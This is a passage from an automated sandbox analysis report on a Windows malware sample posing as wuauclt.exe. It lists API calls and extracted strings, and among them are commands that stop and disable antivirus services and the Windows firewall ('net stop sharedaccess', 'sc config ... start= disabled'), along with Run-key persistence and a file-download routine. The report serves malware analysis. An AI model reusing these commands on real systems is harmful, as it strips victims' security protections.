7968->7970 7969->7970 7970->7967 7972 401627 7971->7972 7973 4016db 7972->7973 7974 401334 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 7972->7974 7976 4011cc LocalAlloc 7972->7976 7977 4016c1 7972->7977 7979 401676 7972->7979 7980 401687 7973->7980 7989 401464 7973->7989 7974->7972 7976->7972 7978 4013ac VirtualFree 7977->7978 7978->7980 7981 4013ac VirtualFree 7979->7981 7980->7913 7981->7980 7983 401c4c 9 API calls 7982->7983 7984 401cac 7983->7984 7985 4011cc LocalAlloc 7984->7985 7986 401cbc 7985->7986 7987 4019f0 9 API calls 7986->7987 7988 401cc4 7986->7988 7987->7988 7988->7914 7990 4014aa 7989->7990 7991 4014c6 VirtualAlloc 7990->7991 7992 4014da 7990->7992 7991->7990 7991->7992 7992->7980 7356 439c35 7357 439c47 7356->7357 7360 439c54 7357->7360 7361 439c79 7360->7361 7364 439cc7 7361->7364 7365 439ced 7364->7365 7366 439d06 VirtualAlloc 7365->7366 7367 439d2a 3 API calls 7366->7367

                                                                            Executed Functions

                                                                            Function 0040558C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowA.USER32(IEFrame,00000000), ref: 0040559A
                                                                            • EnumChildWindows.USER32(?,Function_000053F8), ref: 004055AE
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FindWindow$ChildEnumWindows
                                                                            • String ID: IEFrame
                                                                            • API String ID: 761535084-2708574431
                                                                            • Opcode ID: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction ID: 9fa48d5c06d7a0159174ceea0a4e608dfe463db216e6cfd13e307e5669a667bf
                                                                            • Opcode Fuzzy Hash: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction Fuzzy Hash: CDE0E2E1380B0232E62020E60C83F2B20498B64B68F20103ABE14B82CAFDFDA814152E
                                                                            Function 00404C8C Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            Function 00404A98 Relevance: 3.0, APIs: 2, Instructions: 24nativewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9
                                                                            Function 004072AC Relevance: 129.8, APIs: 21, Strings: 53, Instructions: 296sleepfilewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F
                                                                            Function 00406F74 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 237windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 154 406f74-406fa9 GetDesktopWindow 155 406fab-406fdf FindWindowExA GetWindowTextA call 403b3c call 403e2c 154->155 160 406fe1-406fe8 PostMessageA 155->160 161 406fed-406fef 155->161 160->161 161->155 162 406ff1-406ff6 GetDesktopWindow 161->162 163 406ff8-40702c FindWindowExA GetWindowTextA call 403b3c call 403e2c 162->163 168 40703a-40703c 163->168 169 40702e-407035 PostMessageA 163->169 168->163 170 40703e-407043 GetDesktopWindow 168->170 169->168 171 407045-407079 FindWindowExA GetWindowTextA call 403b3c call 403e2c 170->171 176 407087-407089 171->176 177 40707b-407082 PostMessageA 171->177 176->171 178 40708b-407090 GetDesktopWindow 176->178 177->176 179 407092-4070c6 FindWindowExA GetWindowTextA call 403b3c call 403e2c 178->179 184 4070d4-4070d6 179->184 185 4070c8-4070cf PostMessageA 179->185 184->179 186 4070d8-4070dd GetDesktopWindow 184->186 185->184 187 4070df-407113 FindWindowExA GetWindowTextA call 403b3c call 403e2c 186->187 192 407121-407123 187->192 193 407115-40711c PostMessageA 187->193 192->187 194 407125-40712a GetDesktopWindow 192->194 193->192 195 40712c-407160 FindWindowExA GetWindowTextA call 403b3c call 403e2c 194->195 200 407162-407169 PostMessageA 195->200 201 40716e-407170 195->201 200->201 201->195 202 407172-407180 FindWindowA 201->202 203 407182-407195 FindWindowA PostMessageA 202->203 204 40719a-4071a8 FindWindowA 202->204 203->204 205 4071c2-4071d3 FindWindowA 204->205 206 4071aa-4071bd FindWindowA PostMessageA 204->206 207 4071f0-40720a call 4039f4 205->207 208 4071d5-4071eb FindWindowA PostMessageA 205->208 206->205 208->207
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 48fb78569e5be0b899f8b789ec188c633594ebe80db4bb76db74b7e8956db17f
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 48fb78569e5be0b899f8b789ec188c633594ebe80db4bb76db74b7e8956db17f
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D
                                                                            Function 0040854E Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 188threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 00408550 Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 187threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 004058D0 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 219filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
                                                                            • GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
                                                                              • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
